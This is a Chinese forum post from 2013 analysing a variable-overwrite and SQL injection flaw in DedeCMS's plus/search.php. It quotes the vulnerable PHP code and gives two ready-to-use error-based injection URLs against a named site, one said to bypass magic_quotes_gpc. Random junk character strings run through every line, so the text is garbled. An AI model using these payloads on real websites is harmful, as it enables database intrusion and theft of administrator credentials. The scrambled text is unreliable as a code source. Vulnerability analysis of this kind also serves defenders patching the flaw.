微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.4 q0 }2 S4 v7 |( i; R4 I
作者: c4rp3nt3r@0x50sec.org2 J: A8 q) J( y# q" O! v
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
2 N$ S8 S1 V; i5 n
, j8 T! ?: ~' n8 w黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
. m' W7 w3 S* O- f: U s8 ? ! [- i3 q; J. v' X. n2 T
============
% @" ^1 R$ U/ z" C2 X+ Q! E5 [: \1 h
' _: e7 g3 G" D4 a1 y
% k$ ]3 _+ y5 i" O. pDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码. j2 L. l" S# h3 {
8 F; Y7 q' t" c# l/ T
require_once(dirname(__FILE__).”/../include/common.inc.php”);
2 K. |( p& L1 prequire_once(DEDEINC.”/arc.searchview.class.php”);: Q# m8 u- M* V4 }, l# h+ i" i
4 M# u" e4 T) @# p4 _2 o$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
* o' D( E/ u6 n/ ]- ] D! H$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
1 W7 r$ C% r0 r6 L# r3 p" y$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;1 _; h* B6 u' ^) I0 V
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
) ^; x0 I/ O) N, w+ w$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
- [5 w9 _5 B8 m- n% O5 ^
/ Y2 V+ ~9 M5 ` H; T: v2 Z: S( Iif(!isset($orderby)) $orderby=”;
G4 ~8 e: W, t, Q' Melse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);2 e" j( G. W3 \; ^( b' X6 F$ F
5 s5 @3 I" o5 ~1 }: x: i 1 H+ A) U; [! n, F3 M
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;% |% |" j/ g! h' t
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
$ Z# [5 |7 x! P. w: M% I8 L
! S I5 v1 S% t: Lif(!isset($keyword)){
$ t M b3 e( ^& O) L4 }8 T if(!isset($q)) $q = ”;. f, X# S) {* x* G- ^8 U
$keyword=$q;. x5 V) |) l/ ?& D! N
}8 R1 u' m* u' h6 Q
0 Y0 |& f! K+ A) [' O$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));( U! M6 u* G, h6 P7 @& B+ I5 V
7 t+ u9 i4 F! u V. D
//查找栏目信息
% S* a% q- T& Z; a/ ]if(empty($typeid))' _8 x# ^6 a g. F; A. P7 P
{2 W# y; m; P+ s8 ? _
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;* y4 ^& o2 X5 a+ _7 _" b6 d
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )! S3 K. c c- ^( `3 b% k
{
& d6 _! e7 b9 k! T/ i2 Y3 i $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);1 x5 t, ~* K0 {5 e* W" L2 a
fwrite($fp, “<”.”?php\r\n”);
4 y! p& ^( z2 S* f' y2 f $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);* U. F7 w1 d3 U5 o5 c( \$ A
$dsql->Execute(); x0 J1 z& k- L6 P* u
while($row = $dsql->GetArray())5 B, t) g$ I+ I
{5 }# A* u; W$ n. K; W( g
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);8 f3 V _5 ^/ D" c( n' B" X
}
* h3 q2 T0 u$ ^1 ~ fwrite($fp, ‘?’.'>’); n0 ~" E/ r1 o' m* k4 y8 a
fclose($fp);- C, O/ h) R# c# H$ [" X ?
}
6 q" k2 C" Z0 P9 T4 V //引入栏目缓存并看关键字是否有相关栏目内容
$ `& s8 p% Q) [) E1 z require_once($typenameCacheFile);
, N5 @1 e3 C W! V2 n8 N//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个! |5 j/ J. x% H
//7 `' V0 o. l6 {6 Q
if(isset($typeArr) && is_array($typeArr))
" n$ _* e6 w* c' Q9 G# g8 r% W {
/ G# y3 X6 A( H foreach($typeArr as $id=>$typename) r% U+ A' x/ I* G- ]+ |8 O5 g: T1 A
{( g" z8 |' k3 Y: E
) j6 I3 J: w) y6 v H' Y% _
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
8 B, X0 n( w+ p0 k if($keyword != $keywordn)
. `: W5 W5 K3 F8 l& i+ n0 ? {! u1 d, g( }& s& K# G: \, [
$keyword = $keywordn;+ D. K- ^5 ` |3 q7 d
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
8 @2 E* b! w1 }, d3 z7 C! _/ ~ break;: d1 v2 T$ f- x7 J2 n8 `5 r. \. S
}* F4 A; k' F2 f/ O
}" W0 H$ C4 \+ |1 J l; `
}
1 Z0 X8 b1 O5 h7 {$ f; Z}8 R) ?. R% [. q5 W: ^7 a
然后plus/search.php文件下面定义了一个 Search类的对象 .
* M! l. d6 V6 N9 C& {在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.7 g6 m- V6 C4 d# D
$this->TypeLink = new TypeLink($typeid);
- z9 V0 r3 @* z# G( ?! T+ v3 L
& s: H- n. ?. P/ E. ]' s# jTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.1 p o" W1 j( ?6 [: }$ w! b2 j; {
) I/ C& A- L! P, s6 m0 u; {# [class TypeLink
* C+ N' ~. h; l# h- x{
1 {; ] T# A* a var $typeDir;/ s: b' p/ ]7 x+ @$ Z4 O
var $dsql;5 b, }6 w, T& d1 z! V0 ?
var $TypeID;
! L5 F& \; N6 ?0 A0 d" |9 U# {. H var $baseDir;+ ]4 R+ W- B: ~; _4 C: Y
var $modDir;
9 n9 y* C! x' z. ~& Z. `8 [3 B var $indexUrl;
# y7 d, T' q$ V: B/ U: a( u var $indexName;
! h7 E% `, n! V- u var $TypeInfos;
6 N2 R. p1 m0 I v' T7 } var $SplitSymbol;
& v! W7 f. l' o, ?# M var $valuePosition;
1 c0 J9 b3 ]3 N8 o( x4 ? var $valuePositionName;
$ i' M9 d; F ^4 x$ a8 U" ^! y var $OptionArrayList;//构造函数///////
# ?1 f# N: I7 }/ {: Z //php5构造函数, A1 k9 d) c9 D1 e( h8 U
function __construct($typeid)
' x1 C) [. i2 ~! I+ t1 L5 C {% j- M) t) g2 M0 _
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];! U7 T* r1 r6 n' z* j
$this->indexName = $GLOBALS['cfg_indexname'];* b" S- N! O6 n8 |; b
$this->baseDir = $GLOBALS['cfg_basedir'];* `9 O/ z$ \. u" _
$this->modDir = $GLOBALS['cfg_templets_dir'];
5 I" S( ?0 t8 Q" J" t+ w $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];8 H! d& j( j( ?1 m: h1 W
$this->dsql = $GLOBALS['dsql'];
* K! \8 F( b3 c( f1 x9 N9 {' N $this->TypeID = $typeid;
: w( V" `; c% h $this->valuePosition = ”;9 h z. o; w3 O
$this->valuePositionName = ”;
3 n7 H9 \; K4 b% ^. C) @ $this->typeDir = ”;5 n" ~; e% |* W! _# w% G; O. p
$this->OptionArrayList = ”;# o# W+ k1 s1 X1 N. l8 i
9 e6 J; h/ w2 A$ f. k //载入类目信息0 z4 ]0 w. P1 W& M
8 y& A8 G5 {- e6 C
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
, Q' R2 j- F1 l0 d" Q& Octypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
7 i3 b% S# O9 s5 b7 b/ @`#@__channeltype` ch
6 v8 s5 ^. b5 p/ N+ z# c% \ on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿4 j- t7 l9 r1 b* r5 z' F: ]5 p
1 i' O7 W) B2 a( u; V
if($typeid > 0)
& F/ o0 @ J2 l# L( T {
+ M3 ~) N4 A. s, \6 T/ Y0 O $this->TypeInfos = $this->dsql->GetOne($query);
X }# a. }. ^% }. j- ?. o* O利用代码一 需要 即使magic_quotes_gpc = Off! o8 L- i1 @2 J, `& P& o) I
! U" |3 C1 |+ I, p! K/ ]
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title. N5 i% N& b# T6 n: k4 s& G( c( w
' @ n1 d1 R& ~这只是其中一个利用代码… Search 类的构造函数再往下; k' `/ w2 `4 Q, B
: ~# H/ A) k' T+ ], g5 o: |
……省略6 c0 i: {4 a2 y8 o& a
$this->TypeID = $typeid;# r0 x- Z* B5 }+ k% ~2 m
……省略
v! ^- }5 \7 @3 n @if($this->TypeID==”0″){
4 i7 b+ d6 f. W4 G1 p2 g $this->ChannelTypeid=1;% l, K; t1 C" z: u7 N1 N( ~1 ?# g
}else{+ ?% a% I/ `& j
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
( H' B9 }* m, M) a; l4 s- m& n//现在不鸡肋了吧亲…3 }$ R2 K8 _8 L, O& C/ q$ T* m
$this->ChannelTypeid=$row['channeltype'];8 d) H) L, {1 |* X
- o, ?: q0 R& R; V* L9 j7 ^
}
4 z* Y0 P5 ~+ y/ a+ T6 u) k2 I4 Z利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
0 L- G; y- E* v; Y# b* }- v; i' |
$ ^* K9 Q$ m. swww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title$ E9 ]/ ]. a5 X7 I* f
: Y2 @- h/ `0 s- Z; Q$ C如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站5 Q3 |! r, Q6 x
|
发表于 2013-1-19 08:18:56
收藏
支持
反对